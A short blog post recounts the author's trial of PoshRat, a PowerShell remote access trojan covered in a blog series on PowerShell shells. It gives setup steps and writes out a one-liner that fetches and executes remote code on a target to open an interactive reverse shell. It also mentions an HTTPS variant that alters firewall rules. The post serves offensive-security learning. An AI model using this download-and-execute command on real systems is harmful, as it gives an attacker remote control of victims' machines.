Powershell Remote Access Trojan – PoshRat

I’ve been going through @nikhil_mitt‘s 5-part blog series on Powershell Shells. It’s beautifully and meticulously laid out and covers:

Day 1 – Interactive PowerShell shells over TCP (Click here)
Day 2 – Interactive PowerShell shells over UDP (Click Here)
Day 3 – Interactive PowerShell shells over HTTP/HTTPS (Click Here)
Day 4 – Interactive PowerShell shells with WMI (Click Here)
Day 5 – Interactive PowerShell shells over ICMP and DNS (Click Here)

Nikhil is the author of offensive security Powershell tools Nishang and Kautilya and his blog post series is ideal if you want to roll up your sleeves and play with these tools manually, rather than as part of a framework. I find this strategy helps me see under the hood and really get to grips with the code itself.

Having arrived at day three I was excited that Nikhil was covering @subTee‘s PoshRat – A Remote Access Trojan written purely in powershell.

I played with the HTTP Reverse Shell and although I struggled to set this up, it turned out after talking with @nikhil_mitt and @subTee I’d simply been over-thinking it. It couldn’t be simpler or more elegant:

Download PoshRatHTTP.ps1 on you server and be sure to adjust your execution-policy in an elevated Powershell console to allow for script execution.

Change line 12 of the code:

$Server = '127.0.0.1'

To your “Listening” machine IP

Run the script which creates a HTTP listener that downloads code to the target on connection.

Next make the connection on the target machine in Powershell:

iex (New-Object Net.WebClient).DownloadString("http://server/connect")

And you have interactive Powershell control.

Beautiful.

There are other ways to deliver the code to the target that I haven’t investigated yet. There is also a HTTPS version that allows for encrypted communication, changes firewall rules and even adds a security certificate!

@nikhil_mitt has extended this with Invoke-PoshRatHttps allowing for simplification of the process.

I’d encourage you to hop over to Nikhil’s blog post series where there are instructions, images and videos.

Enjoy. I am.